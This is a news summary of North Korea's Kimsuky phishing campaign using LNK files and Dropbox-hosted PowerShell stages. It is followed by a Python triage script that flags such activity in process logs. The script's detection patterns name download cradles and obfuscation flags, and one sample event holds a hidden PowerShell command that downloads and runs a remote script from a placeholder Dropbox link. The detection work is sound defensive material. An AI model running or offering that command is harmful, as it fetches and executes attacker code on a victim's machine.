North Korean state-backed advanced persistent threat operation Kimsuky has deployed attacks leveraging PowerShell and Dropbox against South Korean government, business, and cryptocurrency firms as part of the DEEP#DRIVE campaign, which may have been ongoing since September, The Hacker News reports.
Kimsuky — also known as APT43, Black Banshee, TA427, and Velvet Chollima — begins its intrusions by distributing phishing emails carrying a ZIP archive attachment that contains an LNK file disguised as a legitimate document, according to a Securonix analysis.
Opening the LNK file triggers execution of PowerShell code that fetches a Dropbox-hosted lure document, retrieves a second PowerShell script that collects and exfiltrates system data, and installs a third PowerShell script intended to execute a .NET assembly whose nature remains unknown.
"Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker's intent to evade detection and complicate incident response," said Securonix researchers.
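The following triage script is added here as an example and is not code from the Securonix analysis or the article. It scores process-creation events for the chain described above: PowerShell launched from Explorer (as a double-clicked LNK would be), pulling content from Dropbox with a download cradle, and using hidden-window or policy-bypass flags. The event field names are assumed to be Sysmon-style, and the sample events, including the Dropbox URL, are constructed.

```python
"""Score process-creation events for DEEP#DRIVE-style indicators:
Explorer-spawned PowerShell that fetches from Dropbox via a download cradle
with obfuscation/hidden-window flags. Field names assumed (Sysmon-like)."""
import re
from typing import Dict, List, Tuple

# Assumed indicator patterns chosen for this example, not taken from the article.
DROPBOX_RE = re.compile(r"dropbox(?:usercontent)?\.com", re.I)
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    re.I)
OBFUSC_RE = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}|-w(?:indowstyle)?\s+hidden|-nop\b|-ep\s+bypass",
    re.I)
PS_HOSTS = ("powershell.exe", "pwsh.exe")
LNK_LAUNCHERS = ("explorer.exe",)  # an LNK opened from an extracted ZIP is launched by Explorer

def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of indicator names matched by a single event."""
    hits: List[str] = []
    if not ev.get("Image", "").lower().endswith(PS_HOSTS):
        return hits  # only PowerShell hosts are of interest here
    cmd = ev.get("CommandLine", "")
    if ev.get("ParentImage", "").lower().endswith(LNK_LAUNCHERS):
        hits.append("powershell spawned by Explorer (LNK-style launch)")
    if DROPBOX_RE.search(cmd):
        hits.append("dropbox fetch")
    if CRADLE_RE.search(cmd):
        hits.append("download cradle")
    if OBFUSC_RE.search(cmd):
        hits.append("obfuscation/hidden-window flags")
    return hits

def triage(events: List[Dict[str, str]]) -> List[Tuple[List[str], Dict[str, str]]]:
    """Return events matching at least two indicators, most indicators first."""
    flagged = [(score_event(e), e) for e in events]
    flagged = [(h, e) for h, e in flagged if len(h) >= 2]
    flagged.sort(key=lambda pair: -len(pair[0]))
    return flagged

# Constructed sample events (not real telemetry); the Dropbox URL is a placeholder.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
     "CommandLine": 'powershell.exe -w hidden -nop -ep bypass -c "iwr https://www.dropbox.com/scl/fi/EXAMPLE/lure.pdf?dl=1 -OutFile $env:TEMP\\lure.pdf; iex (iwr https://www.dropbox.com/scl/fi/EXAMPLE/stage2.ps1?dl=1).Content"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_IMAGE,
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},  # benign interactive use
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -NoProfile -File C:\\ProgramData\\Inventory\\collect.ps1"},  # scheduled task
]

if __name__ == "__main__":
    for hits, ev in triage(SAMPLE_EVENTS):
        print(len(hits), "indicators:", "; ".join(hits))
```

Requiring two or more indicators keeps ordinary Explorer-launched PowerShell and scheduled-task scripts out of the flagged set while still surfacing the multi-stage Dropbox chain.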